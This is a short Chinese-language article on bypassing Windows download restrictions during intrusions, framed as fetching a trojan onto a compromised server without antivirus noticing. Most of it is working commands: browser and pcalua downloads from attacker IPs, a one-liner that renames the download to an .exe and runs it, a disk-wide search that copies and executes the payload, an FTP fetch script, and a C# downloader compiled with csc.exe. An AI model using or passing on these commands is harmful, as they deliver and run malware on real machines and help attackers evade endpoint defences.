Windows通用下载限制绕过方法总结

一、引言

在执行命令时，有时候我们无法获取到回显或进行交互操作，例如无法打开远程桌面、遭遇杀软拦截远程下载木马、循环写入受负载均衡影响等情况。针对远程下载，通常可以尝试以下方法，但这些方法往往只能免杀一段时间，之后就会被杀软察觉。

powershell、certutil、vbs、Bitsadmin、ftp、tftp、debug、msiexec、mshta、rundll32、regsrv32 其中，方法2与5更为方便实用。

二、使用浏览器绕过下载限制 1.1 前提条件

• 服务器可出网
• 服务器安装了其他浏览器
• 需要获取当前用户名 默认浏览器的下载路径一般为 C:\Users\当前用户名\Downloads\，可通过 DNSLog 回显获取。

1.2 利用方法

1.2.1 下载 使用 Windows 自带的 Edge 浏览器进行下载：

<code>start msedge http://192.168.18.1:88/ca.rar</code>

其他浏览器下载方式：

<code>start chrome http://192.168.1.1:19900/demo.rar start firefox http://192.168.1.1:19900/demo.rar</code>

使用默认浏览器下载：

<code>pcalua -m -a http://192.168.18.1/aa.zip</code>

1.2.2 获取用户名、拼接路径

<code>copy C:\users\22498\Downloads\aa.zip C:\users\22498\Downloads\aa.exe&&C:\users\22498\Downloads\aa.exe</code>

1.2.3 更改下载路径解决办法 如果更改了下载路径，则需要全盘搜索，将搜索到的文件复制到 C:\users\public\：

<code>start msedge http://192.168.18.1/asdb.zip &&for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "asdb.zip""') do copy %k c:\users\public\123456.exe&& cmd /c c:\users\public\123456.exe</code>

参考文章：https://mp.weixin.qq.com/s/b3NNiXk7tFJPtq3yuWc7pQ

三、DNSLog 传递载荷

参考文章：https://mp.weixin.qq.com/s/Z1zp7klk–uQ1OnzljNESw

四、FTP 下载 注意：火绒会拦截。 将以下内容复制到 a.txt 文件中：

<code>open 1.1.1.1 21 use passwd bin get a.exe bye</code>

然后使用 ftp -s:a.txt 进行连接。

五、csc.exe 编译下载器 使用 Windows 自带的 csc.exe 编译 C# 代码：

<code>set temp=C:\Users\Public\ && C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe test.txt</code>

代码示例：

<code>using System.Net; namespace downloader { class Program { static void Main(string[] args) { WebClient client = new WebClient(); string URLAddress = @"http://192.168.18.1/2.exe"; string Path = @"C:\\users\public\"; client.DownloadFile(URLAddress, Path + System.IO.Path.GetFileName(URLAddress)); } } }</code>